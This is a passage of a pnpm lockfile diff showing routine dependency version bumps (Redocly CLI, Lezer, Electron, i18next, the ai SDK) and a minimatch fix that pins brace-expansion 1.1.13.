   '@redocly/cli-otel@0.1.2':
     resolution: {integrity: sha512-Bg7BoO5t1x3lVK+KhA5aGPmeXpQmdf6WtTYHhelKJCsQ+tRMiJoFAQoKHoBHAoNxXrhlS3K9lKFLHGmtxsFQfA==}
 
-  '@redocly/cli@2.25.4':
-    resolution: {integrity: sha512-ypBv8ZhckTzcOfsFH2VILsLqk00bJ1tI0POtlaEf8z0rDsnmD8auUETkMzw8wlUB+aQM7+VSzpSsmcmqeSgzWQ==}
+  '@redocly/cli@2.26.0':
+    resolution: {integrity: sha512-24S1ls0qvu3uaPiW4OImy06CpImAkUOd3h7OG+Hq9By5pPavjOE34KtdQTaaFso3e1qgzXYdQh6HPqEY1nTZgA==}
     engines: {node: '>=22.12.0 || >=20.19.0 <21.0.0', npm: '>=10'}
     hasBin: true
 
   '@redocly/config@0.22.2':
     resolution: {integrity: sha512-roRDai8/zr2S9YfmzUfNhKjOF0NdcOIqF7bhf4MVC5UxpjIysDjyudvlAiVbpPHp3eDRWbdzUgtkK1a7YiDNyQ==}
 
-  '@redocly/config@0.46.0':
-    resolution: {integrity: sha512-FZEprNEkmLITKKdv5blIai1qiCcc4dn5+96AjWnmFQmH/oz/OyBiXBSi752/M+Wmype7aH2uRywSCuYlu4CgVA==}
+  '@redocly/config@0.46.1':
+    resolution: {integrity: sha512-dSdkB2wRLtvl3f7ayRu9vqVhUMjjRaxZlHgRbgOtPPXxn4uI/ciDO87h4CJb7Iet+OVpevpAU6gU8bo5qVbQxg==}
 
   '@redocly/openapi-core@1.34.5':
     resolution: {integrity: sha512-0EbE8LRbkogtcCXU7liAyC00n9uNG9hJ+eMyHFdUsy9lB/WGqnEBgwjA9q2cyzAVcdTkQqTBBU1XePNnN3OijA==}
     engines: {node: '>=18.17.0', npm: '>=9.5.0'}
 
-  '@redocly/openapi-core@2.25.4':
-    resolution: {integrity: sha512-zYdKQEsowPNtkTixrfbn5DySWBLQpTsISthVBBEPAa3OZC75UI76CbHXEamJ8Kmlead9IkD5RbgeJvxqJ5/H6Q==}
+  '@redocly/openapi-core@2.26.0':
+    resolution: {integrity: sha512-BjTPzSV1Gv430W9S/7i5T/dEZDK00GFk6ILCNTI+31pA9lEFJOXc0XRJT+V3v+m3nXIgGoo6GgqeLdAiM10rNg==}
     engines: {node: '>=22.12.0 || >=20.19.0 <21.0.0', npm: '>=10'}
 
-  '@redocly/respect-core@2.25.4':
-    resolution: {integrity: sha512-0xMbcSft+9Q2sO1wSJMxo510Aqc/kGF/AmUK3OaLQvGvKUgOqq2Op/0aorNQJk6s8WBEH4UN4eFt7fUzUeXs8g==}
+  '@redocly/respect-core@2.26.0':
+    resolution: {integrity: sha512-mejFg26XNp8pqHwnL75QvI7MO4dhgFKa+v35OgOcVMrU9tGZ/VaFbplEyvdrRgjoonguXoLDoMN4Iw1rWlZg0g==}
     engines: {node: '>=22.12.0 || >=20.19.0 <21.0.0', npm: '>=10'}
 
   '@replit/codemirror-indentation-markers@6.5.3':
@@ -4834,7 +4834,7 @@ packages:
       '@codemirror/language': 6.12.3
       '@codemirror/state': ^6.0.0
       '@codemirror/view': ^6.0.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': ^1.0.0
 
@@ -6548,8 +6548,8 @@ packages:
     resolution: {integrity: sha512-0fztsk/0ryJ+2PPr9EyXS5/Co7OK8q3zY/xOoozEWaUsL5x+C0cyZ4YyMuUffOO2Dx/rAdq4JMPqW0VUtm+vzA==}
     engines: {bun: '>=0.7.0', deno: '>=1.0.0', node: '>=18.0.0'}
 
-  '@zumer/snapdom@2.7.0':
-    resolution: {integrity: sha512-ZiELKzDszeFOazPQ/ExXzgtdoW9jADVjDjInr5XDAlVdCx0RbNsFiG7RLyM48XnA7EyCA9yTvmXSc3ElDrTRqA==}
+  '@zumer/snapdom@2.8.0':
+    resolution: {integrity: sha512-NhztgFDNfOkFt8Ox9PIJ1IwggyMui5UDazysOgZD7FSGL0G7H8U+J3ft0iecxAS8daj5aC62i3blaTk7s2GcpA==}
 
   abbrev@1.1.1:
     resolution: {integrity: sha512-nne9/IiQ/hzIhY6pdDnbBtz7DjPTKrY00P/zvPSm5pOFkl6xuGrGnXn/VtTNNfNtAfZ9/1RtehkszU9qcTii0Q==}
@@ -6630,8 +6630,8 @@ packages:
     resolution: {integrity: sha512-4I7Td01quW/RpocfNayFdFVk1qSuoh0E7JrbRJ16nH01HhKFQ88INq9Sd+nd72zqRySlr9BmDA8xlEJ6vJMrYA==}
     engines: {node: '>=8'}
 
-  ai@6.0.153:
-    resolution: {integrity: sha512-UlgBe4k0Ja1m1Eufn6FVSsHoF0sc7qwxX35ywJPDogIvBz0pHc+NOmCqiRY904DczNYIuwpZfKBLVz8HXgu3mg==}
+  ai@6.0.154:
+    resolution: {integrity: sha512-HfKJKCTJsDZxqrIUDSVnBQ7DpQlx5WI4ExqtLd7Bl70epLmvkpc/HYMzU1hP9W+g9VEAcvZo4fbMqc3v5D+9gQ==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
@@ -6870,6 +6870,9 @@ packages:
   bail@2.0.2:
     resolution: {integrity: sha512-0xO6mYd7JB2YesxDKplafRpsiOzPt9V02ddPCLbY1xYGPOX24NTyN50qnUxgCPcSoYMhKpAuBTjQoRZCAkUDRw==}
 
+  balanced-match@1.0.2:
+    resolution: {integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==}
+
   balanced-match@4.0.3:
     resolution: {integrity: sha512-1pHv8LX9CpKut1Zp4EXey7Z8OfH11ONNH6Dhi2WDUt31VVZFXZzKwXcysBgqSumFCmR+0dqjMK5v5JiFHzi0+g==}
     engines: {node: 20 || >=22}
@@ -6999,6 +7002,9 @@ packages:
   bplist-creator@0.0.8:
     resolution: {integrity: sha512-Za9JKzD6fjLC16oX2wsXfc+qBEhJBJB1YPInoAQpMLhDuj5aVOv1baGeIQSq1Fr3OCqzvsoQcSBSwGId/Ja2PA==}
 
+  brace-expansion@1.1.13:
+    resolution: {integrity: sha512-9ZLprWS6EENmhEOpjCYW2c8VkmOvckIJZfkr7rBW6dObmfgJ/L1GpSYW5Hpo9lDz4D1+n0Ckz8rU7FwHDQiG/w==}
+
   brace-expansion@5.0.5:
     resolution: {integrity: sha512-VZznLgtwhn+Mact9tfiwx64fA9erHH/MCXEUfB/0bX/6Fz6ny5EGTXYltMocqg4xFAQZtnO3DHWWXi8RiuN7cQ==}
     engines: {node: 18 || 20 || >=22}
@@ -7467,6 +7473,9 @@ packages:
     resolution: {integrity: sha512-9mAqGPHLakhCLeNyxPkK4xVo746zQ/czLH1Ky+vkitMnWfWZps8r0qXuwhwizagCRttsL4lfG4pIOvaWLpAP0w==}
     engines: {node: '>= 0.8.0'}
 
+  concat-map@0.0.1:
+    resolution: {integrity: sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==}
+
   concat-stream@1.6.2:
     resolution: {integrity: sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==}
     engines: {'0': node >= 0.8}
@@ -8175,8 +8184,8 @@ packages:
     resolution: {integrity: sha512-bO3y10YikuUwUuDUQRM4KfwNkKhnpVO7IPdbsrejwN9/AABJzzTQ4GeHwyzNSrVO+tEH3/Np255a3sVZpZDjvg==}
     engines: {node: '>=8.0.0'}
 
-  electron@41.1.1:
-    resolution: {integrity: sha512-8bgvDhBjli+3Z2YCKgzzoBPh6391pr7Xv2h/tTJG4ETgvPvUxZomObbZLs31mUzYb6VrlcDDd9cyWyNKtPm3tA==}
+  electron@41.2.0:
+    resolution: {integrity: sha512-0OKLiymqfV0WK68RBXqAm3Myad2TpI5wwxLCBEUcH5Nugo3YfSk7p1Js/AL9266qTz5xZioUnxt9hG8FFwax0g==}
     engines: {node: '>= 12.20.55'}
     hasBin: true
 
@@ -9340,8 +9349,8 @@ packages:
   i18next-http-backend@3.0.4:
     resolution: {integrity: sha512-udwrBIE6cNpqn1gRAqRULq3+7MzIIuaiKRWrz++dVz5SqWW2VwXmPJtAgkI0JtMLFaADC9qNmnZAxWAhsxXx2g==}
 
-  i18next@26.0.3:
-    resolution: {integrity: sha512-1571kXINxHKY7LksWp8wP+zP0YqHSSpl/OW0Y0owFEf2H3s8gCAffWaZivcz14rMkOvn3R/psiQxVsR9t2Nafg==}
+  i18next@26.0.4:
+    resolution: {integrity: sha512-gXF7U9bfioXPLv7mw8Qt2nfO7vij5MyINvPgVv99pX3fL1Y01pw2mKBFrlYpRxRCl2wz3ISenj6VsMJT2isfuA==}
     peerDependencies:
       typescript: ^5 || ^6
     peerDependenciesMeta:
@@ -14098,7 +14107,7 @@ snapshots:
       '@ai-sdk/provider-utils': 4.0.23(zod@4.3.6)
       zod: 4.3.6
 
-  '@ai-sdk/gateway@3.0.93(zod@4.3.6)':
+  '@ai-sdk/gateway@3.0.94(zod@4.3.6)':
     dependencies:
       '@ai-sdk/provider': 3.0.8
       '@ai-sdk/provider-utils': 4.0.23(zod@4.3.6)
@@ -15336,28 +15345,28 @@ snapshots:
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
 
   '@codemirror/commands@6.10.3':
     dependencies:
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
 
   '@codemirror/commands@6.8.1':
     dependencies:
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
 
   '@codemirror/lang-css@6.3.1':
     dependencies:
       '@codemirror/autocomplete': 6.18.6
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/css': 1.1.11
 
   '@codemirror/lang-html@6.4.11':
@@ -15368,7 +15377,7 @@ snapshots:
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/css': 1.1.11
       '@lezer/html': 1.3.12
 
@@ -15379,7 +15388,7 @@ snapshots:
       '@codemirror/lint': 6.8.5
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/javascript': 1.5.1
 
   '@codemirror/lang-json@6.0.2':
@@ -15394,7 +15403,7 @@ snapshots:
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/markdown': 1.4.3
 
   '@codemirror/lang-markdown@6.5.0':
@@ -15404,7 +15413,7 @@ snapshots:
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/markdown': 1.4.3
 
   '@codemirror/lang-php@6.0.2':
@@ -15412,7 +15421,7 @@ snapshots:
       '@codemirror/lang-html': 6.4.11
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/php': 1.0.2
 
   '@codemirror/lang-vue@0.1.3':
@@ -15420,7 +15429,7 @@ snapshots:
       '@codemirror/lang-html': 6.4.11
       '@codemirror/lang-javascript': 6.2.5
       '@codemirror/language': 6.12.3
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': 1.4.2
 
@@ -15430,14 +15439,14 @@ snapshots:
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/xml': 1.0.6
 
   '@codemirror/language@6.12.3':
     dependencies:
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': 1.4.2
       style-mod: 4.1.2
@@ -15952,9 +15961,9 @@ snapshots:
     transitivePeerDependencies:
       - supports-color
 
-  '@electron/remote@2.1.3(electron@41.1.1)':
+  '@electron/remote@2.1.3(electron@41.2.0)':
     dependencies:
-      electron: 41.1.1
+      electron: 41.2.0
 
   '@electron/universal@2.0.2':
     dependencies:
@@ -17161,54 +17170,54 @@ snapshots:
 
   '@keyv/serialize@1.1.1': {}
 
-  '@lezer/common@1.5.1': {}
+  '@lezer/common@1.5.2': {}
 
   '@lezer/css@1.1.11':
     dependencies:
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': 1.4.2
 
   '@lezer/highlight@1.2.3':
     dependencies:
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
 
   '@lezer/html@1.3.12':
     dependencies:
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': 1.4.2
 
   '@lezer/javascript@1.5.1':
     dependencies:
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': 1.4.2
 
   '@lezer/json@1.0.3':
     dependencies:
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': 1.4.2
 
   '@lezer/lr@1.4.2':
     dependencies:
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
 
   '@lezer/markdown@1.4.3':
     dependencies:
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
 
   '@lezer/php@1.0.2':
     dependencies:
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': 1.4.2
 
   '@lezer/xml@1.0.6':
     dependencies:
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': 1.4.2
 
@@ -18390,15 +18399,15 @@ snapshots:
     dependencies:
       ulid: 2.4.0
 
-  '@redocly/cli@2.25.4(@opentelemetry/api@1.9.0)(bufferutil@4.0.9)(core-js@3.46.0)(encoding@0.1.13)(utf-8-validate@6.0.5)':
+  '@redocly/cli@2.26.0(@opentelemetry/api@1.9.0)(bufferutil@4.0.9)(core-js@3.46.0)(encoding@0.1.13)(utf-8-validate@6.0.5)':
     dependencies:
       '@opentelemetry/exporter-trace-otlp-http': 0.202.0(@opentelemetry/api@1.9.0)
       '@opentelemetry/resources': 2.0.1(@opentelemetry/api@1.9.0)
       '@opentelemetry/sdk-trace-node': 2.0.1(@opentelemetry/api@1.9.0)
       '@opentelemetry/semantic-conventions': 1.34.0
       '@redocly/cli-otel': 0.1.2
-      '@redocly/openapi-core': 2.25.4
-      '@redocly/respect-core': 2.25.4
+      '@redocly/openapi-core': 2.26.0
+      '@redocly/respect-core': 2.26.0
       abort-controller: 3.0.0
       ajv: '@redocly/ajv@8.18.0'
       ajv-formats: 3.0.1(@redocly/ajv@8.18.0)
@@ -18432,7 +18441,7 @@ snapshots:
 
   '@redocly/config@0.22.2': {}
 
-  '@redocly/config@0.46.0':
+  '@redocly/config@0.46.1':
     dependencies:
       json-schema-to-ts: 2.7.2
 
@@ -18450,10 +18459,10 @@ snapshots:
     transitivePeerDependencies:
       - supports-color
 
-  '@redocly/openapi-core@2.25.4':
+  '@redocly/openapi-core@2.26.0':
     dependencies:
       '@redocly/ajv': 8.18.0
-      '@redocly/config': 0.46.0
+      '@redocly/config': 0.46.1
       ajv: '@redocly/ajv@8.18.0'
       ajv-formats: 3.0.1(@redocly/ajv@8.18.0)
       colorette: 1.4.0
@@ -18463,12 +18472,12 @@ snapshots:
       pluralize: 8.0.0
       yaml-ast-parser: 0.0.43
 
-  '@redocly/respect-core@2.25.4':
+  '@redocly/respect-core@2.26.0':
     dependencies:
       '@faker-js/faker': 7.6.0
       '@noble/hashes': 1.8.0
       '@redocly/ajv': 8.18.0
-      '@redocly/openapi-core': 2.25.4
+      '@redocly/openapi-core': 2.26.0
       ajv: '@redocly/ajv@8.18.0'
       better-ajv-errors: 1.2.0(@redocly/ajv@8.18.0)
       colorette: 2.0.20
@@ -18484,13 +18493,13 @@ snapshots:
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
 
-  '@replit/codemirror-lang-nix@6.0.1(@codemirror/autocomplete@6.18.6)(@codemirror/language@6.12.3)(@codemirror/state@6.6.0)(@codemirror/view@6.41.0)(@lezer/common@1.5.1)(@lezer/highlight@1.2.3)(@lezer/lr@1.4.2)':
+  '@replit/codemirror-lang-nix@6.0.1(@codemirror/autocomplete@6.18.6)(@codemirror/language@6.12.3)(@codemirror/state@6.6.0)(@codemirror/view@6.41.0)(@lezer/common@1.5.2)(@lezer/highlight@1.2.3)(@lezer/lr@1.4.2)':
     dependencies:
       '@codemirror/autocomplete': 6.18.6
       '@codemirror/language': 6.12.3
       '@codemirror/state': 6.6.0
       '@codemirror/view': 6.41.0
-      '@lezer/common': 1.5.1
+      '@lezer/common': 1.5.2
       '@lezer/highlight': 1.2.3
       '@lezer/lr': 1.4.2
 
@@ -21250,7 +21259,7 @@ snapshots:
 
   '@zip.js/zip.js@2.8.11': {}
 
-  '@zumer/snapdom@2.7.0': {}
+  '@zumer/snapdom@2.8.0': {}
 
   abbrev@1.1.1: {}
 
@@ -21313,9 +21322,9 @@ snapshots:
       clean-stack: 2.2.0
       indent-string: 4.0.0
 
-  ai@6.0.153(zod@4.3.6):
+  ai@6.0.154(zod@4.3.6):
     dependencies:
-      '@ai-sdk/gateway': 3.0.93(zod@4.3.6)
+      '@ai-sdk/gateway': 3.0.94(zod@4.3.6)
       '@ai-sdk/provider': 3.0.8
       '@ai-sdk/provider-utils': 4.0.23(zod@4.3.6)
       '@opentelemetry/api': 1.9.0
@@ -21588,6 +21597,8 @@ snapshots:
 
   bail@2.0.2: {}
 
+  balanced-match@1.0.2: {}
+
   balanced-match@4.0.3: {}
 
   bare-events@2.7.0: {}
@@ -21728,6 +21739,11 @@ snapshots:
       stream-buffers: 2.2.0
     optional: true
 
+  brace-expansion@1.1.13:
+    dependencies:
+      balanced-match: 1.0.2
+      concat-map: 0.0.1
+
   brace-expansion@5.0.5:
     dependencies:
       balanced-match: 4.0.3
@@ -22365,6 +22381,8 @@ snapshots:
     transitivePeerDependencies:
       - supports-color
 
+  concat-map@0.0.1: {}
+
   concat-stream@1.6.2:
     dependencies:
       buffer-from: 1.1.2
@@ -23152,10 +23170,10 @@ snapshots:
       - supports-color
     optional: true
 
-  electron@41.1.1:
+  electron@41.2.0:
     dependencies:
       '@electron/get': 2.0.3
-      '@types/node': 24.12.0
+      '@types/node': 24.12.2
       extract-zip: 2.0.1
     transitivePeerDependencies:
       - supports-color
@@ -24791,7 +24809,7 @@ snapshots:
     transitivePeerDependencies:
       - encoding
 
-  i18next@26.0.3(typescript@6.0.2):
+  i18next@26.0.4(typescript@6.0.2):
     dependencies:
       '@babel/runtime': 7.29.2
     optionalDependencies:
@@ -26242,7 +26260,7 @@ snapshots:
 
   minimatch@3.1.5:
     dependencies:
-      brace-expansion: 5.0.5
+      brace-expansion: 1.1.13
 
   minimatch@5.1.9:
     dependencies:
@@ -27433,11 +27451,11 @@ snapshots:
       react: 19.2.4
       scheduler: 0.27.0
 
-  react-i18next@17.0.2(i18next@26.0.3(typescript@6.0.2))(react-dom@19.2.4(react@19.2.4))(react@19.2.4)(typescript@6.0.2):
+  react-i18next@17.0.2(i18next@26.0.4(typescript@6.0.2))(react-dom@19.2.4(react@19.2.4))(react@19.2.4)(typescript@6.0.2):
     dependencies:
       '@babel/runtime': 7.29.2
       html-parse-stringify: 3.0.1
-      i18next: 26.0.3(typescript@6.0.2)
+      i18next: 26.0.4(typescript@6.0.2)
       react: 19.2.4
       use-sync-external-store: 1.6.0(react@19.2.4)
     optionalDependencies: